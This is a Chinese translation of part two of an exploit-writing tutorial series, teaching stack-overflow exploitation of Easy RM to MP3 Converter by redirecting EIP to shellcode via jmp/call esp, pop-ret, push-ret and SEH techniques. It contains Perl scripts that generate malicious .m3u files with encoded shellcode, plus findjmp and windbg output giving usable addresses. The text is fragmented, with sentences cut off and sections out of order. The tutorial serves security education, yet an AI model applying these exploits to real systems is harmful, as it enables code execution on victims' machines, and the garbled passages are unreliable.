exploit编写教程（二）

Exploit 编写系列教程第二篇: 栈溢出——跳至 shellcode

【作者】：Peter Van Eeckhoutte

【译者】：riusksk（泉哥：http://riusksk.blogbus.com）

跳至何处？

在上篇教程中（Exploit 编写系列教程第一篇：基于栈的溢出），笔者已讲述了关于漏洞发现，以及利用这些信息来编写可行的 exploit 的相关

基础知识。本文所举的例子仍旧是上篇中的实例，我们已经知道 ESP 几乎直接指向我们缓冲区的入口（我只是为 shellcode 预先放置了 4 字节数

据，以便使 ESP 直接指向 shellcode）， 这样我们就可以使用“jmp esp”指令来获得 shellcode 的执行。

以利用程序运行时加载的 DLL，去搜索”jump/call register”等操作指令所在的内存地址。当构造 payload 时，我们就可以利用该内存地址去覆

盖 EIP。当然，如果有一个直接指向 shellcode 的寄存器可以利用，那也不是不可以的。但由于在第一部分中我们正是利用这种方法来尽力使

exploit 得以执行的，因此本文将不再赘述此种方法。

● pop return: 如果栈顶并没有指向攻击者指定的缓冲区，但此缓冲区又起始于栈顶下方的数字节处，那么你就可以使程序执行一系列的 POP

指令和一个 RET 指令，以此将这些字节弹出栈（每 POP 一次，ESP 指针就更接近 shellcode 入口一步），直至正确的缓冲区入口处。执行 RET

指令后，ESP 中的当前栈值将放入 EIP 中。因此当 ESP+x 包含我们的 shellcode 所在的缓冲区地址时（当在调试器中执行命令“d esp”时，

你就可以看到在 ESP+offset 中的缓冲区地址，但由于 Intel x86 是属于小端法机器，因此数据可能是反序的）， POP RET 方法还是可行的。

● push return: 这种方法明显不同于“call register”技术。如果你找不到<jump register>或者<call register>的机器码，那么你可以简单将一个地

址压栈，然后执行 ret，因此你只需搜索 ret 之后的 push <register>指令即可。先查找这一串操作指令，再查找执行这串指令的地址，最后利用

该地址覆盖 EIP。

code，以跳转至缓冲区首部的关键 shellcode。

● SHE：每一程序中均有默认的异常处理程序，这是由操作系统提供的。因此即使程序原本就没有使用异常处理，但你也可以用自己的地址去

覆盖 SHE handler，以使其跳转至 shellcode。利用 SHE 可以使 exploit 在 windows 平台下运行得更为稳定，但在利用 SHE 编写 exploit 之前，

你需要先掌握一些知识。如果你编写的 exploit 无法在被给的操作系统中运行，那么 payload 可能会导致程序崩溃（触发异常）。因此你可以将

“regular”exploit 配合覆盖 SHE 的方式来编写 exploit，以此编写出更为可靠的 exploit。在本系列教程的下一篇文章（第三部分）中将讲述关

于 SHE 的内容，这里读者只需记住：在一个被覆写 EIP 的典型栈溢出中，也可以利用 SHE 技术来编写 exploit，以使其运行得更为稳定，同

时获取更大可用空间的缓冲区（覆盖 EIP 以触发 SHE„„真可谓一箭双雕）。

这里还有很多其它可以使 exploit 稳定运行的方法，但如果你精通以上利用技术，再结合你的知识，你 也是可以找出一种更为可行的方法使 exploit

跳至 shellcode。如果一项技术是可行，但 shellcode 并没有运行，这时你可以利用 shellcode 编码器将其编码，再将 shellcode 后移一段，然后在

shellcode 之前写入一些 NOP„这些都将使你的 exploit 工作得更好！当然，有些漏洞只能导致程序崩溃，而无法利用，这也是完全可能存在的。

ESP 的首字节即是 shellcode 的首字节），如果这时你用“call esp”地址覆盖 EIP，那么 shellcode 将被执行。这种方法在所有寄存器下均可行，

并且十分流行，因为 kernel32.dll 中包含有很多 call [reg]地址。

例如：假设 ESP 指向 shellcode，首先搜索包含’call esp’操作码的地址。我们可以找到 jmp:

Findjmp, Eeye, I2S-LaB

Findjmp2, Hat-Squad

Scanning kernel32.dll for code useable with the esp register

0x7C836A08 call esp

0x7C874413 jmp esp

Finished Scanning kernel32.dll for code useable with the esp register

Found 2 usable addresses

接下来，编写 exploit，并用地址 0x7c836a08 覆盖 EIP。这里使用本系列教程第一部分中的实例 Easy RM to MP3 来讲解,我们可以通过在被覆写

的 EIP 与 ESP 之间添加 4 字符，以此将 ESP 指向 shellcode 入口。典型的一份 exploit 代码如下：

my $file= "test1.m3u";

# Encoder: x86/alpha_upper

# EXITFUNC=seh, CMD=calc

$shellcode = $shellcode . "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .

"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .

"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .

"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .

"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .

"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .

"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .

"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .

"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .

"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .

"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .

"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .

"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .

"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .

"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .

"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

open($FILE,">$file");

print $FILE $junk.$eip.$prependesp.$shellcode;

正如上面所述的一般，在 Easy RM to MP3 一例中，我们已经能够调整缓冲区，使 ESP 直接指向我们的 shellcode。但要是 shellcode 入口发生偏

my $junk= "A" x 26094;

my $eip = "BBBB"; #overwrite EIP

my $prependesp = "XXXX"; #add 4 bytes so ESP points at beginning of shellcode bytes

my $shellcode = "\xcc"; #first break

$shellcode = $shellcode . "\x90" x 7; #add 7 more bytes

$shellcode = $shellcode . "\xcc"; #second break

$shellcode = $shellcode . "\x90" x 500; #real shellcode

open($FILE,">$file");

print $FILE $junk.$eip.$prependesp.$shellcode;

close($FILE);

入口（0x000ff738）。

Missing image name, possible paged-out or corrupt data.

Missing image name, possible paged-out or corrupt data.

<Unloaded_P32.dll>+0x42424231:

42424242 ?? ???

0:000> d esp

000ff730 cc 90 90 90 90 90 90 90-cc 90 90 90 90 90 90 90 ................

000ff740 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff750 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff760 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff770 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff758 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff768 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff778 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff788 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff798 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

000ff7a8 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

之后的缓冲区就必须包含 shellcode。

我们需要查找出 pop,pop,ret 的指令串地址，然后用这指令串的首地址来覆盖 EIP，接着让 ESP+8 指向 jmp esp 指令地址，最后紧跟着的就是

shellcode 自身了。首先需要搜索 pop pop ret 机器码，这个我们可以借助 windbg 的汇编功能来搜索：

0:000> a

7c90120e pop eax

pop eax

7c90120f pop ebp

pop ebp

7c901210 ret

ret

7c901211

ntdll!DbgBreakPoint:

7c90120e 58 pop eax

7c90120f 5d pop ebp

7c901216 8b442404 mov eax,dword ptr [esp+4]

7c90121a cc int 3

因此 pop pop ret 指令的机器码为 0x58,0x5d,0xc3。当然你也可 pop 其它寄存器，这里有其它可用的 pop 机器码：

现在我们需要在一个可用的 DLL 中搜索这一指令串。在第一部分教程中，我们已经讲过关于应用程序以及操作系统的 DLL 知识。这里笔者建

议使用应用程序 DLL，因为这将提高 exploit 在跨 windows 平台/版本下运行的可靠性„„但你需要先确定所使用的 DLL 基址每次是否都相同。

有时，dll 的基址会被重定向，在这种情况下，使用 OS dll（例如 user32.dll 或 kernel32.dll）也许会更好。

打开 Easy RM to MP3，（不要打开一个文件或其它东西），然后用 windbg 附加进程。windbg 将显示加载模块，包括操作系统模块和应用程序模

块（在 windbg 输出栏的上方可以看到以 ModLoad 开头的信息行）。下面是应用程序加载的一些 DLL：

ModLoad: 00ce0000 00d7f000 C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll

ModLoad: 01a90000 01b01000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll